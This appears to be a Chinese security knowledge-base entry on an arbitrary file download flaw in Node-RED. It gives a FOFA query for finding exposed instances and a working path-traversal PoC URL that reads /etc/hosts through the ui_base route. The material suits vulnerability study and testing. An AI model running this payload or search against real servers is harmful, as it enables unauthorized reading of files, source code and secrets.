menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Node-RED 任意文件下载漏洞 chevron_right Node-RED 任意文件下载漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Node-RED 任意文件下载漏洞.md
    449 B / 2021-07-15 19:58:07
        # Node-RED 任意文件下载漏洞

## 漏洞描述

Node-RED存在任意文件下载漏洞,可造成信息泄露,源码泄露。

## 漏洞影响

> Node-RED

## FOFA

> title="Node-RED"

## 漏洞复现

页面如下:

![图片3](/resource/Node-RED/图片3.png)

###poc

```
/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts
```

![图片4](/resource/Node-RED/图片4.png)

![图片5](/resource/Node-RED/图片5.png)
    links
    file_download